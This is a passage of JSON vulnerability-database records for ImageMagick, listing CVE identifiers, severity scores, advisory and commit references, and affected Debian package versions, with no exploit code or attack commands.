"https://github.com/ImageMagick/ImageMagick/commit/651672f19c75161a6159d9b6838fd3095b6c5304" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick6/commit/7486477aa00c5c7856b111506da075b6cdfa8b73", "reference_id": "7486477aa00c5c7856b111506da075b6cdfa8b73", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-04-25T13:40:47Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/7486477aa00c5c7856b111506da075b6cdfa8b73" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick6/commit/b466a96965afc1308a4ace93f5535c2b770f294b", "reference_id": "b466a96965afc1308a4ace93f5535c2b770f294b", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-04-25T13:40:47Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/b466a96965afc1308a4ace93f5535c2b770f294b" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/o:redhat:enterprise_linux:6", "reference_id": "cpe:/o:redhat:enterprise_linux:6", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/o:redhat:enterprise_linux:6" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/o:redhat:enterprise_linux:7", "reference_id": "cpe:/o:redhat:enterprise_linux:7", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/o:redhat:enterprise_linux:7" }, { "reference_url": "https://access.redhat.com/security/cve/CVE-2023-3745", "reference_id": "CVE-2023-3745", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-04-25T13:40:47Z/" } ], "url": "https://access.redhat.com/security/cve/CVE-2023-3745" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2023-3745" ], "risk_score": 2.5, "exploitability": "0.5", "weighted_severity": "5.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-56xz-svu7-eue2" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82666?format=api", "vulnerability_id": "VCID-5a4x-wwha-pufn", "summary": "ImageMagick: heap-based buffer over-read in the function WritePNMImage of coders/pnm.c leading to DoS or information disclosure", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-11598.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-11598.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00222", "scoring_system": "epss", "scoring_elements": "0.44703", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00222", "scoring_system": "epss", "scoring_elements": "0.44783", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00222", "scoring_system": "epss", "scoring_elements": "0.44804", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00222", "scoring_system": "epss", "scoring_elements": "0.44743", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00222", "scoring_system": "epss", "scoring_elements": "0.44796", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00222", "scoring_system": "epss", "scoring_elements": "0.44798", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00222", "scoring_system": "epss", "scoring_elements": "0.44815", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00222", "scoring_system": "epss", "scoring_elements": "0.44784", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00222", "scoring_system": "epss", "scoring_elements": "0.44786", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00222", "scoring_system": "epss", "scoring_elements": "0.44839", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00222", "scoring_system": "epss", "scoring_elements": "0.44832", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00222", "scoring_system": "epss", "scoring_elements": "0.44763", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00222", "scoring_system": "epss", "scoring_elements": "0.44681", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1705414", "reference_id": "1705414", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1705414" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=928206", "reference_id": "928206", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=928206" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4034-1/", "reference_id": "USN-4034-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4034-1/" }, { "reference_url": "https://usn.ubuntu.com/6985-1/", "reference_id": "USN-6985-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6985-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": 